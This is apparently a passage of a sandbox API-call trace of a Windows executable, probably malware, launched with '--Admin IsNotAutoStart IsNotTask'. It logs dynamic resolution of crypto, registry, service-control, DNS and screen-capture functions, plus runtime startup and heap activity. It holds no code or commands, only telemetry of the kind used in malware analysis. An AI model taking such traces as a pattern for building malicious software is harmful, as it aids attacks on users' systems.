(hModule=0x76c20000, lpProcName="CreateDirectoryW") returned 0x76c34259 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleMode") returned 0x76c4a77d [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76cd793f [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="PeekConsoleInputA") returned 0x76cd6f0d [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeZoneInformation") returned 0x76c3465a [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleW") returned 0x76cd739a [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringW") returned 0x76c5d1d4 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleCtrlHandler") returned 0x76c38a09 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0038.724] GetProcAddress (hModule=0x76c20000, lpProcName="FatalAppExitA") returned 0x76cb4691 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="GetExitCodeProcess") returned 0x76c4174d [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="AreFileApisANSI") returned 0x76cb40d1 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0038.725] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0038.726] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0038.726] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0038.726] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleInputA") returned 0x76cd6f53 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0038.727] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0038.728] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0038.728] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0038.728] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0038.728] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThread") returned 0x76c317ec [0038.728] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0038.728] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="PeekMessageW") returned 0x74f605ba [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="PostThreadMessageW") returned 0x74f58bff [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcW") returned 0x771625dd [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="DispatchMessageW") returned 0x74f5787b [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExW") returned 0x74f58a29 [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorW") returned 0x74f588f7 [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="IsWindow") returned 0x74f57136 [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="ShowWindow") returned 0x74f60dfb [0038.728] GetProcAddress (hModule=0x74f40000, lpProcName="RegisterClassExW") returned 0x74f5b17d [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="GetMessageW") returned 0x74f578e2 [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcessWindowStation") returned 0x74f59eea [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="GetUserObjectInformationW") returned 0x74f58068 [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="GetDesktopWindow") returned 0x74f60a19 [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxW") returned 0x74fafd3f [0038.729] GetProcAddress (hModule=0x74f40000, lpProcName="TranslateMessage") returned 0x74f57809 [0038.729] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0038.729] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0038.729] GetProcAddress (hModule=0x74d40000, lpProcName="CloseServiceHandle") returned 0x74d5369c [0038.729] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameW") returned 0x74d5157a [0038.729] GetProcAddress (hModule=0x74d40000, lpProcName="ReportEventA") returned 0x74d43ee9 [0038.729] GetProcAddress (hModule=0x74d40000, lpProcName="RegisterEventSourceA") returned 0x74d52d46 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="DeregisterEventSource") returned 0x74d535dd [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="ControlService") returned 0x74d67144 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptImportKey") returned 0x74d4c532 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="QueryServiceStatus") returned 0x74d52a86 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="OpenServiceW") returned 0x74d4ca4c [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="OpenSCManagerW") returned 0x74d4ca64 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextW") returned 0x74d4df14 [0038.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0038.731] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetPathFromIDListW") returned 0x760617bf [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetSpecialFolderLocation") returned 0x7605e141 [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteA") returned 0x76217078 [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="CommandLineToArgvW") returned 0x75fe9ee8 [0038.733] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathA") returned 0x760e7804 [0038.733] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0038.733] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitialize") returned 0x755fb636 [0038.733] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitializeSecurity") returned 0x75607259 [0038.733] GetProcAddress (hModule=0x755e0000, lpProcName="CoUninitialize") returned 0x756286d3 [0038.733] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0038.733] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0038.733] GetProcAddress (hModule=0x75220000, lpProcName=0x6) returned 0x75223e59 [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0x8) returned 0x75223ed5 [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0x9) returned 0x75223eae [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0xc8) returned 0x75223f21 [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0xca) returned 0x7522fd6b [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0xc9) returned 0x75224af8 [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0xc) returned 0x75225dee [0038.734] GetProcAddress (hModule=0x75220000, lpProcName=0x2) returned 0x75224642 [0038.734] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74b50000 [0038.737] GetProcAddress (hModule=0x74b50000, lpProcName="GetAdaptersInfo") returned 0x74b59263 [0038.737] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0038.739] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0038.739] GetProcAddress (hModule=0x75bc0000, lpProcName=0xb) returned 0x75bc311b [0038.739] GetProcAddress (hModule=0x75bc0000, lpProcName=0x34) returned 0x75bd7673 [0038.739] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74a80000 [0038.742] GetProcAddress (hModule=0x74a80000, lpProcName="DnsFree") returned 0x74a8436b [0038.742] GetProcAddress (hModule=0x74a80000, lpProcName="DnsQuery_W") returned 0x74a9572c [0038.742] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0038.742] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0038.742] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0038.742] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="GetObjectA") returned 0x75ae85d4 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="GetBitmapBits") returned 0x75aec155 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="BitBlt") returned 0x75ae5ea6 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteDC") returned 0x75ae58b3 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateDCA") returned 0x75ae7bcc [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleDC") returned 0x75ae54f4 [0038.743] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleBitmap") returned 0x75ae5f49 [0038.743] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0038.748] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0038.748] atexit (param_1=0x760920) returned 0 [0038.753] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eda8 | out: lpSystemTimeAsFileTime=0x18eda8*(dwLowDateTime=0x15d0b8d0, dwHighDateTime=0x1d5956a)) [0038.753] GetCurrentThreadId () returned 0x93c [0038.753] GetCurrentProcessId () returned 0x938 [0038.753] QueryPerformanceCounter (in: lpPerformanceCount=0x18eda0 | out: lpPerformanceCount=0x18eda0*=15894864483) returned 1 [0038.795] GetStartupInfoW (in: lpStartupInfo=0x18ed38 | out: lpStartupInfo=0x18ed38*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76c33519, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0038.805] GetProcessHeap () returned 0x660000 [0038.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0038.898] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0038.900] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0038.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3bc) returned 0x681688 [0038.901] GetCurrentThreadId () returned 0x93c [0038.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x677d30 [0038.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x800) returned 0x681a50 [0038.906] GetStartupInfoW (in: lpStartupInfo=0x18ed08 | out: lpStartupInfo=0x18ed08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xa76d4f02, hStdError=0x58)) [0038.906] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0038.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0038.906] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0038.906] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask" [0038.906] GetEnvironmentStringsW () returned 0x682258* [0038.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xaca) returned 0x682d30 [0038.943] FreeEnvironmentStringsW (penv=0x682258) returned 1 [0038.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x683808 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x98) returned 0x683900 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3e) returned 0x676918 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x6c) returned 0x6839a0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x6e) returned 0x683a18 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x78) returned 0x674ae8 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x62) returned 0x683a90 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2e) returned 0x67d460 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x48) returned 0x679148 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x28) returned 0x67cdd0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1a) returned 0x681320 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x4a) returned 0x683b00 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x72) returned 0x674b68 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x30) returned 0x67d498 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2e) returned 0x67d4d0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1c) returned 0x681348 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xd2) returned 0x683b58 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x7c) returned 0x683c38 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x36) returned 0x683cc0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3a) returned 0x676960 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x90) returned 0x683d00 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x67ce00 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x30) returned 0x67d508 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x36) returned 0x683d98 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x48) returned 0x679198 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x52) returned 0x683dd8 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3c) returned 0x6769a8 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x82) returned 0x683e38 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2e) returned 0x67d540 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1e) returned 0x681370 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2c) returned 0x67d578 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x54) returned 0x683ec8 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x52) returned 0x683f28 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x67d5b0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3c) returned 0x6769f0 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x54) returned 0x683f88 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x67ce30 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x30) returned 0x67d5e8 [0038.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x8c) returned 0x682258 [0038.949] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d30 | out: hHeap=0x660000) returned 1 [0039.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x800) returned 0x6822f0 [0039.020] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x80) returned 0x682af8 [0039.052] GetLastError () returned 0x0 [0039.052] IsValidCodePage (CodePage=0x4e4) returned 1 [0039.052] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecfc | out: lpCPInfo=0x18ecfc) returned 1 [0039.058] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7c4 | out: lpCPInfo=0x18e7c4) returned 1 [0039.063] GetLastError () returned 0x0 [0039.067] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0039.068] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e308, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0039.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ 